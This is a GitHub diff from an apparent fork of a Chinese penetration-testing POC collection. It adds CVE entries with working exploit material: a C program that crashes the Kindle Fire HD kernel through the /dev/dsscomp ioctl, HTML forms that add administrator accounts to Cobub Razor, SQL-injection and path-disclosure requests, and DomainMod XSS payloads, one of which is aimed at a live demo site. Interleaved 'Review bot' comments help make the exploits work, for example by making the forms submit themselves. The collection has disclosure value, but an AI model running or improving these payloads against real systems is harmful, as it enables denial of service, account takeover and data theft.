forked from Mr-xn/Penetration_Testing_POC
Showing 29 changed files with 1,015 additions and 1 deletion.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -0,0 +1,230 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞|2018-10-10|大兵|[http://www.amazon.com/](http://www.amazon.com/) | [下载连接](https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2) |Fire OS 4.5.5.3| [CVE-2018-11021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。 | ||
|
||
### POC实现代码如下: | ||
|
||
> exp代码如下: | ||
``` c | ||
/* | ||
* This is poc of Kindle Fire HD 3rd | ||
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517. | ||
* Related buggy struct name is dsscomp_setup_dispc_data. | ||
* This Poc should run with permission to do ioctl on /dev/dsscomp. | ||
* | ||
* The fowllwing is kmsg of kernel crash infomation: | ||
* | ||
* | ||
*/ | ||
#include <stdio.h> | ||
#include <fcntl.h> | ||
#include <errno.h> | ||
#include <sys/ioctl.h> | ||
|
||
const static char *driver = "/dev/dsscomp"; | ||
static command = 1118064517; | ||
|
||
int main(int argc, char **argv, char **env) { | ||
unsigned int payload[] = { | ||
0xffffffff, | ||
0x00000003, | ||
0x5d200040, | ||
0x79900008, | ||
0x8f5928bd, | ||
0x78b02422, | ||
0x00000000, | ||
0xffffffff, | ||
0xf4c50400, | ||
0x007fffff, | ||
0x8499f562, | ||
0xffff0400, | ||
0x001b131d, | ||
0x60818210, | ||
0x00000007, | ||
0xffffffff, | ||
0x00000000, | ||
0x9da9041c, | ||
0xcd980400, | ||
0x001f03f4, | ||
0x00000007, | ||
0x2a34003f, | ||
0x7c80d8f3, | ||
0x63102627, | ||
0xc73643a8, | ||
0xa28f0665, | ||
0x00000000, | ||
0x689e57b4, | ||
0x01ff0008, | ||
0x5e7324b1, | ||
0xae3b003f, | ||
0x0b174d86, | ||
0x00000400, | ||
0x21ffff37, | ||
0xceb367a4, | ||
0x00000040, | ||
0x00000001, | ||
0xec000f9e, | ||
0x00000001, | ||
0x000001ff, | ||
0x00000000, | ||
0x00000000, | ||
0x0000000f, | ||
0x0425c069, | ||
0x038cc3be, | ||
0x0000000f, | ||
0x00000080, | ||
0xe5790100, | ||
0x5b1bffff, | ||
0x0000d355, | ||
0x0000c685, | ||
0xa0070000, | ||
0x0010ffff, | ||
0x00a0ff00, | ||
0x00000001, | ||
0xff490700, | ||
0x0832ad03, | ||
0x00000006, | ||
0x00000002, | ||
0x00000001, | ||
0x81f871c0, | ||
0x738019cb, | ||
0xbf47ffff, | ||
0x00000040, | ||
0x00000001, | ||
0x7f190f33, | ||
0x00000001, | ||
0x8295769b, | ||
0x0000003f, | ||
0x869f2295, | ||
0xffffffff, | ||
0xd673914f, | ||
0x05055800, | ||
0xed69b7d5, | ||
0x00000000, | ||
0x0107ebbd, | ||
0xd214af8d, | ||
0xffff4a93, | ||
0x26450008, | ||
0x58df0000, | ||
0xd16db084, | ||
0x03ff30dd, | ||
0x00000001, | ||
0x209aff3b, | ||
0xe7850800, | ||
0x00000002, | ||
0x30da815c, | ||
0x426f5105, | ||
0x0de109d7, | ||
0x2c1a65fc, | ||
0xfcb3d75f, | ||
0x00000000, | ||
0x00000001, | ||
0x8066be5b, | ||
0x00000002, | ||
0xffffffff, | ||
0x5cf232ec, | ||
0x680d1469, | ||
0x00000001, | ||
0x00000020, | ||
0xffffffff, | ||
0x00000400, | ||
0xd1d12be8, | ||
0x02010200, | ||
0x01ffc16f, | ||
0xf6e237e6, | ||
0x007f0000, | ||
0x01ff08f8, | ||
0x000f00f9, | ||
0xbad07695, | ||
0x00000000, | ||
0xbaff0000, | ||
0x24040040, | ||
0x00000006, | ||
0x00000004, | ||
0x00000000, | ||
0xbc2e9242, | ||
0x009f5f08, | ||
0x00800000, | ||
0x00000000, | ||
0x00000001, | ||
0xff8800ff, | ||
0x00000001, | ||
0x00000000, | ||
0x000003f4, | ||
0x6faa8472, | ||
0x00000400, | ||
0xec857dd5, | ||
0x00000000, | ||
0x00000040, | ||
0xffffffff, | ||
0x3f004874, | ||
0x0000b77a, | ||
0xec9acb95, | ||
0xfacc0001, | ||
0xffff0001, | ||
0x0080ffff, | ||
0x3600ff03, | ||
0x00000001, | ||
0x8fff7d7f, | ||
0x6b87075a, | ||
0x00000000, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x001001ff, | ||
0x00000000, | ||
0x00000001, | ||
0xff1f0512, | ||
0x00000001, | ||
0x51e32167, | ||
0xc18c55cc, | ||
0x00000000, | ||
0xffffffff, | ||
0xb4aaf12b, | ||
0x86edfdbd, | ||
0x00000010, | ||
0x0000003f, | ||
0xabff7b00, | ||
0xffff9ea3, | ||
0xb28e0040, | ||
0x000fffff, | ||
0x458603f4, | ||
0xffff007f, | ||
0xa9030f02, | ||
0x00000001, | ||
0x002cffff, | ||
0x9e00cdff, | ||
0x00000004, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141 }; | ||
|
||
int fd = 0; | ||
fd = open(driver, O_RDWR); | ||
if (fd < 0) { | ||
printf("Failed to open %s, with errno %d\n", driver, errno); | ||
system("echo 1 > /data/local/tmp/log"); | ||
return -1; | ||
} | ||
printf("Try open %s with command 0x%x.\n", driver, command); | ||
printf("System will crash and reboot.\n"); | ||
if(ioctl(fd, command, &payload) < 0) { | ||
printf("Allocation of structs failed, %d\n", errno); | ||
system("echo 2 > /data/local/tmp/log"); | ||
return -1; | ||
} | ||
close(fd); | ||
return 0; | ||
} | ||
``` |
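Review bot: `static command = 1118064517;` declares `command` with no type (implicit `int`), which is invalid in C99 and later and is rejected outright by recent GCC; declare it as `static unsigned long command = 1118064517;`, the type `ioctl(2)` takes for its request argument. The block also calls `system()` and `close()` without including `<stdlib.h>` and `<unistd.h>`, so add both; and `&payload` passes a pointer-to-array where plain `payload` (decaying to `unsigned int *`) is the idiomatic form, though both resolve to the same address, so that part is style only. The header comment announces "The fowllwing is kmsg of kernel crash infomation:" and then stops; either paste the kmsg excerpt or drop the heading, and fix the spelling ("following", "information"). It would help readers to decode the magic request number once: 1118064517 is 0x42A44F85, i.e. direction=write, argument size=0x2A4 (676 bytes), type='O' (0x4F), nr=0x85 (133), which is consistent with the `dsscomp_setup_dispc_data` struct named in the comment and explains why the payload must cover at least 676 bytes (it supplies 174 words, 696 bytes). Finally, "should run with permission to do ioctl on /dev/dsscomp" leaves the key question open: state the owner, group and mode of the device node on Fire OS 4.5.5.3 so readers can tell whether an unprivileged app can reach it, since that decides the severity of the crash.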
@@ -0,0 +1,28 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.7.2存在跨站请求伪造漏洞|2018-03-06|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.7.2 | [CVE-2018-7720](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。 | ||
### POC实现代码如下: | ||
|
||
> 利用代码如下: | ||
``` html | ||
<body> | ||
<script>alert(document.cookie)</script> | ||
<form action="http://localhost/index.php?/user/createNewUser/" method="POST"> | ||
<input type="hidden" name="username" value="test123" /> | ||
<input type="hidden" name="email" value="test@test123.test" /> | ||
<input type="hidden" name="password" value="test" /> | ||
<input type="hidden" name="confirm_password" value="test" /> | ||
<input type="hidden" name="userrole" value="3" /> | ||
<input type="hidden" name="user/ccreateNewUser" value="�ˆ›�»�" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
</body> | ||
</html> | ||
``` |
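Review bot: the page only behaves as the overview says ("open the page and the test123/test administrator is added") if the form submits itself; as written the victim must click "Submit request", so append `<script>document.forms[0].submit()</script>` after the form. The hidden field `name="user/ccreateNewUser" value="�ˆ›�»�"` is corrupted: the name has a doubled `c` relative to the `createNewUser` action the form posts to and the value is mojibake; restore the intended name and value or drop the field, since the five fields above it are the ones the description relies on. `<script>alert(document.cookie)</script>` is unrelated to the CSRF and only pops an alert on the attacker's own page; remove it. The markup is also unbalanced (`</html>` with no opening `<html>` or `<head>`).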
@@ -0,0 +1,29 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.7.2越权增加管理员账户|2018-04-09|ppb([email protected])|[https://github.com/cobub/razor/](https://github.com/cobub/razor/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.72| [CVE-2018-7745](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/161)告知作者。 | ||
|
||
### POC实现代码如下: | ||
|
||
> 利用代码如下: | ||
``` html | ||
<html> | ||
<body> | ||
<script>history.pushState('', '', '/')</script> | ||
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST"> | ||
<input type="hidden" name="siteurl" value="http://127.0.0.1/" /> | ||
<input type="hidden" name="superuser" value="test" /> | ||
<input type="hidden" name="pwd" value="test123" /> | ||
<input type="hidden" name="verifypassword" value="test123" /> | ||
<input type="hidden" name="email" value="[email protected]" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
</body> | ||
</html> | ||
``` |
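Review bot: the version column reads `0.72` where the title and overview say 0.7.2; fix the typo so the table matches. As in the other Cobub entry, the form is not auto-submitted, so "opening the page" does not create the test/test123 account by itself; add `<script>document.forms[0].submit()</script>` after the form if the description is to hold. The product homepage column gives the GitHub URL while the neighbouring Cobub entries use http://www.cobub.com/; use one convention. The overview should also say why `/install/installation/createuserinfo` is still reachable on an installed instance (whether the installer is never locked after setup), since that is the root cause a reader will look for and it is what distinguishes this from the CSRF entry.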
@@ -0,0 +1,18 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.8.0存在SQL注入漏洞|2018-04-16|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.8.0| [CVE-2018-8057](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 | ||
|
||
### POC实现代码如下: | ||
|
||
> http://localhost/index.php?/manage/channel/addchannel | ||
> POST data: | ||
> 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1 | ||
> 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1 | ||
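Review bot: the overview names both `channel_name` and `platform` as injectable, but both POC requests inject only through `channel_name`; add a `platform` payload or narrow the claim. The payloads are shown decoded: the double quote, spaces and `--` must be URL-encoded in an `application/x-www-form-urlencoded` body, and the trailing `JQon` / `NklJ` tokens are sqlmap's random comment suffixes and can be dropped. State the expected result for each: payload 1 is the MySQL `FLOOR(RAND(0)*2)` duplicate-key error-based probe, so success is a "Duplicate entry" error in the response containing the markers `qqpkq` and `qxjvq` (0x7171706b71 and 0x71786a7671) around the `1`; payload 2 succeeds if the response is delayed by about 5 seconds. Also say whether `/manage/channel/addchannel` requires an authenticated session, since that determines the severity.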
@@ -0,0 +1,40 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.8.0存在物理路径泄露漏洞|2018-04-20|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) | 0.8.0| [CVE-2018-8056](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056)/[CVE-2018-8770](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 | ||
### POC实现代码如下: | ||
|
||
> 方法一: | ||
``` raw | ||
URL: http://localhost/export.php | ||
HTTP Method: GET | ||
URL: http://localhost/index.php?/manage/channel/addchannel | ||
HTTP Method: POST | ||
Data: channel_name=test"&platform=1 | ||
``` | ||
> 方法二: | ||
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。 | ||
``` raw | ||
HTTP Method: GET | ||
http://localhost/tests/generate.php | ||
http://localhost/tests/controllers/getConfigTest.php | ||
http://localhost/tests/controllers/getUpdateTest.php | ||
http://localhost/tests/controllers/postclientdataTest.php | ||
http://localhost/tests/controllers/posterrorTest.php | ||
http://localhost/tests/controllers/posteventTest.php | ||
http://localhost/tests/controllers/posttagTest.php | ||
http://localhost/tests/controllers/postusinglogTest.php | ||
http://localhost/tests/fixtures/Controller_fixt.php | ||
http://localhost/tests/fixtures/Controller_fixt2.php | ||
http://localhost/tests/fixtures/view_fixt2.php | ||
http://localhost/tests/libs/ipTest.php | ||
http://localhost/tests/models/commonDbfix.php | ||
``` |
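Review bot: two CVE ids (CVE-2018-8056 and CVE-2018-8770) are listed for one entry but nothing says which method corresponds to which; label each method with its CVE. The overview sentence is pasted again verbatim under 方法二 and should be removed there. 方法一 bundles two independent requests (a GET to `/export.php` and a POST to `/manage/channel/addchannel` with `channel_name=test"`) in one block; separate them and, for the POST, note that it is the same unbalanced-quote input as the SQL-injection entry, so the disclosed path is presumably in the database error output that entry relies on. Under 方法二, the files under `/tests/` look like unit-test cases and fixtures shipped inside the web root; the list should say that the fix is to exclude `tests/` from the deployed tree, not only to patch each file.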
@@ -0,0 +1,39 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|DomainMod的XSS|2018-05-24|longer/套哥([email protected])|[https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) | [https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) |4.09.03/4.10.0| [CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11404](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404)/[CVE-2018-11558](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558)/[CVE-2018-11559](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559)| | ||
|
||
#### 漏洞概述 | ||
|
||
> DomainMod v4.09.03版本和v4.10.0版本 存在XSS的页面 | ||
|
||
### POC实现代码如下: | ||
|
||
> DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 | ||
>CSRF测试页面代码如下: | ||
``` html | ||
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E | ||
``` | ||
> DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 | ||
>CSRF测试页面代码如下: | ||
``` html | ||
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E | ||
``` | ||
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 | ||
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: | ||
``` raw | ||
post url https://demo.domainmod.org/settings/profile/ | ||
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 | ||
``` | ||
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 | ||
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: | ||
``` raw | ||
post url https://demo.domainmod.org/settings/profile/ | ||
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 | ||
``` |
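Review bot: CVE-2018-11403 is listed twice in the CVE column, and four distinct parameters are described (`oid`, `sslpaid`, `new_first_name`, `new_last_name`) against five CVE links; map each parameter to its CVE and drop the duplicate. The two "CSRF测试页面代码如下" labels are wrong: what follows is a reflected-XSS URL, not a CSRF page, and it is fenced as `html` although it is a bare URL; relabel it as the XSS trigger URL and use a plain fence. The two POST examples target `https://demo.domainmod.org/settings/profile/`, a live third-party demo, while every other entry uses a local host; point them at `http://127.0.0.1/settings/profile/` so readers do not test against someone else's instance. The `new_first_name` and `new_last_name` cases are the same stored-XSS pattern (the payload is saved in the profile and fires when an administrator views the user), so describe both as stored XSS rather than only the second, and fix "查看用户是" to "查看用户时".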